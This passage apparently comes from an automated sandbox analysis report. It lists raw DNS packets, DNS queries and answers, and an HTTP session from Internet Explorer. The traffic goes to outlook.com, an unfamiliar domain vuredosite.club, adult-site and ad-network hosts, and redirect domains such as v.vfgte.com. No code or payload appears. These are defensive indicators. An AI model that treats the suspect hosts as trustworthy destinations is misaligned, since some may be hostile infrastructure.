                                                                                                              Jul 14, 2021 15:48:11.947179079 CEST5535953192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.960560083 CEST53553598.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:11.983000994 CEST5830653192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.987709045 CEST6412453192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:11.995903969 CEST53583068.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.000539064 CEST53641248.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.067157030 CEST4936153192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.079461098 CEST53587848.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.083242893 CEST53493618.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.095902920 CEST6315053192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.125993013 CEST53557088.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.137020111 CEST53631508.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.228458881 CEST5327953192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.242551088 CEST53532798.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.323012114 CEST5688153192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.336105108 CEST53568818.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.684083939 CEST5364253192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.699738979 CEST53536428.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.879894972 CEST5566753192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.893663883 CEST53556678.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.907186985 CEST5483353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.942995071 CEST6247653192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:12.956402063 CEST53624768.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:12.987462044 CEST4970553192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.014607906 CEST53497058.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.028877020 CEST6147753192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.032063007 CEST6163353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.041376114 CEST53614778.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.045175076 CEST53616338.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.103856087 CEST5594953192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST53559498.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.141252041 CEST5760153192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.144398928 CEST4934253192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.154074907 CEST53576018.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.157198906 CEST53493428.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.163647890 CEST53548338.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.490489006 CEST5625353192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.510392904 CEST53562538.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.665746927 CEST4966753192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.678721905 CEST53496678.8.8.8192.168.2.3
                                                                                                              Jul 14, 2021 15:48:13.952934027 CEST5543953192.168.2.38.8.8.8
                                                                                                              Jul 14, 2021 15:48:13.966341019 CEST53554398.8.8.8192.168.2.3

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Jul 14, 2021 15:47:25.931644917 CEST192.168.2.38.8.8.80xae44Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:26.955091953 CEST192.168.2.38.8.8.80xf6afStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.053947926 CEST192.168.2.38.8.8.80xcd84Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.307626009 CEST192.168.2.38.8.8.80x9da2Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.849246025 CEST192.168.2.38.8.8.80xa15cStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.953054905 CEST192.168.2.38.8.8.80x88c5Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:10.365509987 CEST192.168.2.38.8.8.80x1382Standard query (0)vuredosite.clubA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:10.698997974 CEST192.168.2.38.8.8.80x246eStandard query (0)www.redtube.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:10.699883938 CEST192.168.2.38.8.8.80x760dStandard query (0)vuredosite.clubA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:10.790649891 CEST192.168.2.38.8.8.80x28f8Standard query (0)www.redtube.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.821281910 CEST192.168.2.38.8.8.80x5a66Standard query (0)cdn1d-static-shared.phncdn.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.827414036 CEST192.168.2.38.8.8.80xf681Standard query (0)ei.rdtcdn.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.834091902 CEST192.168.2.38.8.8.80xb65cStandard query (0)static.trafficjunky.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.850749016 CEST192.168.2.38.8.8.80x65f2Standard query (0)di.rdtcdn.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.873614073 CEST192.168.2.38.8.8.80xaa8cStandard query (0)ei.rdtcdn.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.877441883 CEST192.168.2.38.8.8.80xad42Standard query (0)di.rdtcdn.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.880283117 CEST192.168.2.38.8.8.80x6d41Standard query (0)static.trafficjunky.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.947179079 CEST192.168.2.38.8.8.80x7a2Standard query (0)ht.redtube.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.983000994 CEST192.168.2.38.8.8.80xfad8Standard query (0)static.trafficjunky.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.987709045 CEST192.168.2.38.8.8.80x15e3Standard query (0)ht.redtube.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.067157030 CEST192.168.2.38.8.8.80x9ffaStandard query (0)static.trafficjunky.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.228458881 CEST192.168.2.38.8.8.80x330dStandard query (0)cdn1d-static-shared.phncdn.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.684083939 CEST192.168.2.38.8.8.80x6311Standard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.879894972 CEST192.168.2.38.8.8.80x852Standard query (0)di-ph.rdtcdn.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.907186985 CEST192.168.2.38.8.8.80xb4b3Standard query (0)ei-ph.rdtcdn.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.987462044 CEST192.168.2.38.8.8.80xf5f8Standard query (0)www.google.chA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.028877020 CEST192.168.2.38.8.8.80xa57dStandard query (0)hw-cdn.trafficjunky.netA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.032063007 CEST192.168.2.38.8.8.80xe7a8Standard query (0)ads.trafficjunky.netA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.103856087 CEST192.168.2.38.8.8.80x6561Standard query (0)www.adpmbtj.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.141252041 CEST192.168.2.38.8.8.80xd35Standard query (0)hw-cdn.trafficjunky.netA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.144398928 CEST192.168.2.38.8.8.80xa895Standard query (0)ads.trafficjunky.netA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.490489006 CEST192.168.2.38.8.8.80x1fb9Standard query (0)v.vfgte.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.665746927 CEST192.168.2.38.8.8.80x4639Standard query (0)cdn1d-static-shared.phncdn.comA (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.952934027 CEST192.168.2.38.8.8.80x901bStandard query (0)s2.static.cfgr3.comA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Jul 14, 2021 15:47:06.327312946 CEST8.8.8.8192.168.2.30xd187No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:25.944113970 CEST8.8.8.8192.168.2.30xae44No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:25.944113970 CEST8.8.8.8192.168.2.30xae44No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:25.944113970 CEST8.8.8.8192.168.2.30xae44No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:25.944113970 CEST8.8.8.8192.168.2.30xae44No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:25.944113970 CEST8.8.8.8192.168.2.30xae44No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:25.944113970 CEST8.8.8.8192.168.2.30xae44No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:25.944113970 CEST8.8.8.8192.168.2.30xae44No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:25.944113970 CEST8.8.8.8192.168.2.30xae44No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:26.968219995 CEST8.8.8.8192.168.2.30xf6afNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:26.968219995 CEST8.8.8.8192.168.2.30xf6afNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:26.968219995 CEST8.8.8.8192.168.2.30xf6afNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:26.968219995 CEST8.8.8.8192.168.2.30xf6afNo error (0)outlook.ms-acdc.office.comZRH-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:26.968219995 CEST8.8.8.8192.168.2.30xf6afNo error (0)ZRH-efz.ms-acdc.office.com52.97.201.242A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:26.968219995 CEST8.8.8.8192.168.2.30xf6afNo error (0)ZRH-efz.ms-acdc.office.com52.97.201.210A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:26.968219995 CEST8.8.8.8192.168.2.30xf6afNo error (0)ZRH-efz.ms-acdc.office.com52.97.186.146A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:26.968219995 CEST8.8.8.8192.168.2.30xf6afNo error (0)ZRH-efz.ms-acdc.office.com52.97.186.114A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.066414118 CEST8.8.8.8192.168.2.30xcd84No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.066414118 CEST8.8.8.8192.168.2.30xcd84No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.066414118 CEST8.8.8.8192.168.2.30xcd84No error (0)outlook.ms-acdc.office.comZRH-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.066414118 CEST8.8.8.8192.168.2.30xcd84No error (0)ZRH-efz.ms-acdc.office.com52.98.168.178A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.066414118 CEST8.8.8.8192.168.2.30xcd84No error (0)ZRH-efz.ms-acdc.office.com52.97.201.242A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.066414118 CEST8.8.8.8192.168.2.30xcd84No error (0)ZRH-efz.ms-acdc.office.com52.97.201.226A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.066414118 CEST8.8.8.8192.168.2.30xcd84No error (0)ZRH-efz.ms-acdc.office.com52.97.201.194A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.320375919 CEST8.8.8.8192.168.2.30x9da2No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.320375919 CEST8.8.8.8192.168.2.30x9da2No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.320375919 CEST8.8.8.8192.168.2.30x9da2No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.320375919 CEST8.8.8.8192.168.2.30x9da2No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.320375919 CEST8.8.8.8192.168.2.30x9da2No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.320375919 CEST8.8.8.8192.168.2.30x9da2No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.320375919 CEST8.8.8.8192.168.2.30x9da2No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.320375919 CEST8.8.8.8192.168.2.30x9da2No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.862534046 CEST8.8.8.8192.168.2.30xa15cNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.862534046 CEST8.8.8.8192.168.2.30xa15cNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.862534046 CEST8.8.8.8192.168.2.30xa15cNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.862534046 CEST8.8.8.8192.168.2.30xa15cNo error (0)outlook.ms-acdc.office.comZRH-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.862534046 CEST8.8.8.8192.168.2.30xa15cNo error (0)ZRH-efz.ms-acdc.office.com52.97.232.194A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.862534046 CEST8.8.8.8192.168.2.30xa15cNo error (0)ZRH-efz.ms-acdc.office.com52.97.201.210A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.862534046 CEST8.8.8.8192.168.2.30xa15cNo error (0)ZRH-efz.ms-acdc.office.com52.97.232.210A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.862534046 CEST8.8.8.8192.168.2.30xa15cNo error (0)ZRH-efz.ms-acdc.office.com52.98.163.18A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.965689898 CEST8.8.8.8192.168.2.30x88c5No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.965689898 CEST8.8.8.8192.168.2.30x88c5No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.965689898 CEST8.8.8.8192.168.2.30x88c5No error (0)outlook.ms-acdc.office.comZRH-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.965689898 CEST8.8.8.8192.168.2.30x88c5No error (0)ZRH-efz.ms-acdc.office.com52.97.186.114A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.965689898 CEST8.8.8.8192.168.2.30x88c5No error (0)ZRH-efz.ms-acdc.office.com52.97.201.210A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.965689898 CEST8.8.8.8192.168.2.30x88c5No error (0)ZRH-efz.ms-acdc.office.com52.97.201.226A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:47:27.965689898 CEST8.8.8.8192.168.2.30x88c5No error (0)ZRH-efz.ms-acdc.office.com52.97.232.210A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:10.393398046 CEST8.8.8.8192.168.2.30x1382No error (0)vuredosite.club37.120.222.6A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:10.713897943 CEST8.8.8.8192.168.2.30x760dNo error (0)vuredosite.club37.120.222.6A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:10.721282005 CEST8.8.8.8192.168.2.30x246eNo error (0)www.redtube.comredtube.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:10.721282005 CEST8.8.8.8192.168.2.30x246eNo error (0)redtube.com66.254.114.238A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:10.803733110 CEST8.8.8.8192.168.2.30x28f8No error (0)www.redtube.comredtube.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:10.803733110 CEST8.8.8.8192.168.2.30x28f8No error (0)redtube.com66.254.114.238A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.834767103 CEST8.8.8.8192.168.2.30x5a66No error (0)cdn1d-static-shared.phncdn.comvip0x08e.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.834767103 CEST8.8.8.8192.168.2.30x5a66No error (0)vip0x08e.ssl.rncdn5.com205.185.208.142A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.847233057 CEST8.8.8.8192.168.2.30xb65cNo error (0)static.trafficjunky.comvip0x04f.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.847233057 CEST8.8.8.8192.168.2.30xb65cNo error (0)vip0x04f.ssl.rncdn5.com205.185.208.79A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.863822937 CEST8.8.8.8192.168.2.30x65f2No error (0)di.rdtcdn.comcds.e9q5t8x5.hwcdn.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.891727924 CEST8.8.8.8192.168.2.30xad42No error (0)di.rdtcdn.comcds.e9q5t8x5.hwcdn.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.892944098 CEST8.8.8.8192.168.2.30x6d41No error (0)static.trafficjunky.comvip0x04f.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.892944098 CEST8.8.8.8192.168.2.30x6d41No error (0)vip0x04f.ssl.rncdn5.com205.185.208.79A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.960560083 CEST8.8.8.8192.168.2.30x7a2No error (0)ht.redtube.comhubtraffic.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.960560083 CEST8.8.8.8192.168.2.30x7a2No error (0)hubtraffic.com66.254.114.32A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.995903969 CEST8.8.8.8192.168.2.30xfad8No error (0)static.trafficjunky.comvip0x04f.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:11.995903969 CEST8.8.8.8192.168.2.30xfad8No error (0)vip0x04f.ssl.rncdn5.com205.185.208.79A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.000539064 CEST8.8.8.8192.168.2.30x15e3No error (0)ht.redtube.comhubtraffic.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.000539064 CEST8.8.8.8192.168.2.30x15e3No error (0)hubtraffic.com66.254.114.32A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.079461098 CEST8.8.8.8192.168.2.30xf681No error (0)ei.rdtcdn.comei.rdtcdn.com.sds.rncdn7.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.079461098 CEST8.8.8.8192.168.2.30xf681No error (0)ei.rdtcdn.com.sds.rncdn7.com64.210.135.70A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.079461098 CEST8.8.8.8192.168.2.30xf681No error (0)ei.rdtcdn.com.sds.rncdn7.com64.210.135.72A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.079461098 CEST8.8.8.8192.168.2.30xf681No error (0)ei.rdtcdn.com.sds.rncdn7.com64.210.135.68A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.083242893 CEST8.8.8.8192.168.2.30x9ffaNo error (0)static.trafficjunky.comvip0x04f.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.083242893 CEST8.8.8.8192.168.2.30x9ffaNo error (0)vip0x04f.ssl.rncdn5.com205.185.208.79A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.125993013 CEST8.8.8.8192.168.2.30xaa8cNo error (0)ei.rdtcdn.comei.rdtcdn.com.sds.rncdn7.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.125993013 CEST8.8.8.8192.168.2.30xaa8cNo error (0)ei.rdtcdn.com.sds.rncdn7.com64.210.135.72A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.125993013 CEST8.8.8.8192.168.2.30xaa8cNo error (0)ei.rdtcdn.com.sds.rncdn7.com64.210.135.68A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.125993013 CEST8.8.8.8192.168.2.30xaa8cNo error (0)ei.rdtcdn.com.sds.rncdn7.com64.210.135.70A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.242551088 CEST8.8.8.8192.168.2.30x330dNo error (0)cdn1d-static-shared.phncdn.comvip0x08e.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.242551088 CEST8.8.8.8192.168.2.30x330dNo error (0)vip0x08e.ssl.rncdn5.com205.185.208.142A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.699738979 CEST8.8.8.8192.168.2.30x6311No error (0)stats.g.doubleclick.netstats.l.doubleclick.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.699738979 CEST8.8.8.8192.168.2.30x6311No error (0)stats.l.doubleclick.net74.125.128.154A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.699738979 CEST8.8.8.8192.168.2.30x6311No error (0)stats.l.doubleclick.net74.125.128.156A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.699738979 CEST8.8.8.8192.168.2.30x6311No error (0)stats.l.doubleclick.net74.125.128.157A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.699738979 CEST8.8.8.8192.168.2.30x6311No error (0)stats.l.doubleclick.net74.125.128.155A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:12.893663883 CEST8.8.8.8192.168.2.30x852No error (0)di-ph.rdtcdn.comcds.b8w3s7t8.hwcdn.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.014607906 CEST8.8.8.8192.168.2.30xf5f8No error (0)www.google.ch172.217.168.3A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.041376114 CEST8.8.8.8192.168.2.30xa57dNo error (0)hw-cdn.trafficjunky.netvip0x055.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.041376114 CEST8.8.8.8192.168.2.30xa57dNo error (0)vip0x055.ssl.rncdn5.com205.185.208.85A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.045175076 CEST8.8.8.8192.168.2.30xe7a8No error (0)ads.trafficjunky.net66.254.114.38A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)www.adpmbtj.comadpmbtj.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)adpmbtj.com192.99.16.134A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)adpmbtj.com192.99.16.68A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)adpmbtj.com142.4.219.200A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)adpmbtj.com192.99.16.137A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)adpmbtj.com192.99.16.114A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.117070913 CEST8.8.8.8192.168.2.30x6561No error (0)adpmbtj.com192.99.16.132A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.154074907 CEST8.8.8.8192.168.2.30xd35No error (0)hw-cdn.trafficjunky.netvip0x055.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.154074907 CEST8.8.8.8192.168.2.30xd35No error (0)vip0x055.ssl.rncdn5.com205.185.208.85A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.157198906 CEST8.8.8.8192.168.2.30xa895No error (0)ads.trafficjunky.net66.254.114.38A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.163647890 CEST8.8.8.8192.168.2.30xb4b3No error (0)ei-ph.rdtcdn.comei-ph.rdtcdn.com.sds.rncdn7.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.163647890 CEST8.8.8.8192.168.2.30xb4b3No error (0)ei-ph.rdtcdn.com.sds.rncdn7.com64.210.135.68A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.163647890 CEST8.8.8.8192.168.2.30xb4b3No error (0)ei-ph.rdtcdn.com.sds.rncdn7.com64.210.135.70A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.163647890 CEST8.8.8.8192.168.2.30xb4b3No error (0)ei-ph.rdtcdn.com.sds.rncdn7.com64.210.135.72A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.510392904 CEST8.8.8.8192.168.2.30x1fb9No error (0)v.vfgte.comstivers-ricsovers.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.510392904 CEST8.8.8.8192.168.2.30x1fb9No error (0)stivers-ricsovers.com3.65.154.208A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.510392904 CEST8.8.8.8192.168.2.30x1fb9No error (0)stivers-ricsovers.com18.195.174.160A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.678721905 CEST8.8.8.8192.168.2.30x4639No error (0)cdn1d-static-shared.phncdn.comvip0x08e.ssl.rncdn5.comCNAME (Canonical name)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.678721905 CEST8.8.8.8192.168.2.30x4639No error (0)vip0x08e.ssl.rncdn5.com205.185.208.142A (IP address)IN (0x0001)
                                                                                                              Jul 14, 2021 15:48:13.966341019 CEST8.8.8.8192.168.2.30x901bNo error (0)s2.static.cfgr3.comvip0x011.ssl.hwcdn.netCNAME (Canonical name)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • outlook.com

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.34973140.97.116.8280C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                              TimestampkBytes transferredDirectionData
